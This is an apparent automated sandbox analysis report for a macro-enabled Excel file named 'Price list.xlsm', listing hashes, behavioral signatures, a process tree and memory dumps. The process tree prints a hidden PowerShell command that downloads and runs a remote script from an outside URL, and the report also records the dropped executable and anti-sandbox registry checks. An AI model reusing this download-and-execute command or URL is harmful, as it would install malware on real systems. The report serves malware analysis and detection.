Analysis
-
max time kernel
123s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
04-05-2021 15:01
Static task
static1
Behavioral task
behavioral1
Sample
Price list.xlsm
Resource
win7v20210410
General
-
Target
Price list.xlsm
-
Size
64KB
-
MD5
dc48640ca8488d4c4e61b807ef19d11c
-
SHA1
e2cfbc565e62b269a7bfbdf2b3c060e52aaa6614
-
SHA256
c8f3d97c54386b86778a1d20917353583bcf706ffe0615d962683d55e449bcab
-
SHA512
06d0b3420f784cad69e11202271b99f47c7c5eeca68de9a5e01da6ebf2c5b25414ec242dd4517eeff43fcd239ec8ded073a9317c1140ae9e3c6b620b6af741b9
Malware Config
Extracted
https://cenga.hr/components/search/pri.ps1
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 40 416 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
HsJzA.exepid process 3980 HsJzA.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 852 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
HsJzA.exepowershell.exepid process 3980 HsJzA.exe 3980 HsJzA.exe 416 powershell.exe 416 powershell.exe 416 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
HsJzA.exepowershell.exedescription pid process Token: SeDebugPrivilege 3980 HsJzA.exe Token: SeDebugPrivilege 416 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 852 EXCEL.EXE 852 EXCEL.EXE 852 EXCEL.EXE 852 EXCEL.EXE 852 EXCEL.EXE 852 EXCEL.EXE 852 EXCEL.EXE 852 EXCEL.EXE 852 EXCEL.EXE 852 EXCEL.EXE 852 EXCEL.EXE 852 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEHsJzA.execmd.exedescription pid process target process PID 852 wrote to memory of 3980 852 EXCEL.EXE HsJzA.exe PID 852 wrote to memory of 3980 852 EXCEL.EXE HsJzA.exe PID 3980 wrote to memory of 2208 3980 HsJzA.exe cmd.exe PID 3980 wrote to memory of 2208 3980 HsJzA.exe cmd.exe PID 2208 wrote to memory of 416 2208 cmd.exe powershell.exe PID 2208 wrote to memory of 416 2208 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Price list.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\HsJzA.exeC:\Users\Admin\AppData\Local\Temp\HsJzA.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://cenga.hr/components/search/pri.ps1'))"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\HsJzA.exeMD5
c8f1a39398783633b0fdcf9c744001ee
SHA1db1ac98baa818def3931ccce9bd63434cf81587d
SHA256d506b695f45cb729a6af2e18708597fe2f7df623d4f36e1ab1a4f118dbbdccf9
SHA512d4d3c235e7224de8378b21b43f713df904903c7c01fda8ba4110469c8f9e766ea44b0ffda8ea47ec97fbc383db51f969e0fcfed7d0e0de194b891b928855c60b
-
C:\Users\Admin\AppData\Local\Temp\HsJzA.exeMD5
c8f1a39398783633b0fdcf9c744001ee
SHA1db1ac98baa818def3931ccce9bd63434cf81587d
SHA256d506b695f45cb729a6af2e18708597fe2f7df623d4f36e1ab1a4f118dbbdccf9
SHA512d4d3c235e7224de8378b21b43f713df904903c7c01fda8ba4110469c8f9e766ea44b0ffda8ea47ec97fbc383db51f969e0fcfed7d0e0de194b891b928855c60b
-
memory/416-185-0x0000000000000000-mapping.dmp
-
memory/416-186-0x000001D0F8B60000-0x000001D0F8B62000-memory.dmpFilesize
8KB
-
memory/416-187-0x000001D0F8B63000-0x000001D0F8B65000-memory.dmpFilesize
8KB
-
memory/416-188-0x000001D0F8B66000-0x000001D0F8B68000-memory.dmpFilesize
8KB
-
memory/852-117-0x00007FFD2ADC0000-0x00007FFD2ADD0000-memory.dmpFilesize
64KB
-
memory/852-123-0x00007FFD497C0000-0x00007FFD4B6B5000-memory.dmpFilesize
31.0MB
-
memory/852-114-0x00007FF629660000-0x00007FF62CC16000-memory.dmpFilesize
53.7MB
-
memory/852-122-0x00007FFD4B6C0000-0x00007FFD4C7AE000-memory.dmpFilesize
16.9MB
-
memory/852-121-0x00007FFD2ADC0000-0x00007FFD2ADD0000-memory.dmpFilesize
64KB
-
memory/852-118-0x00007FFD2ADC0000-0x00007FFD2ADD0000-memory.dmpFilesize
64KB
-
memory/852-116-0x00007FFD2ADC0000-0x00007FFD2ADD0000-memory.dmpFilesize
64KB
-
memory/852-115-0x00007FFD2ADC0000-0x00007FFD2ADD0000-memory.dmpFilesize
64KB
-
memory/2208-184-0x0000000000000000-mapping.dmp
-
memory/3980-179-0x0000000000000000-mapping.dmp
-
memory/3980-183-0x000000001B023000-0x000000001B025000-memory.dmpFilesize
8KB
-
memory/3980-182-0x000000001B020000-0x000000001B022000-memory.dmpFilesize
8KB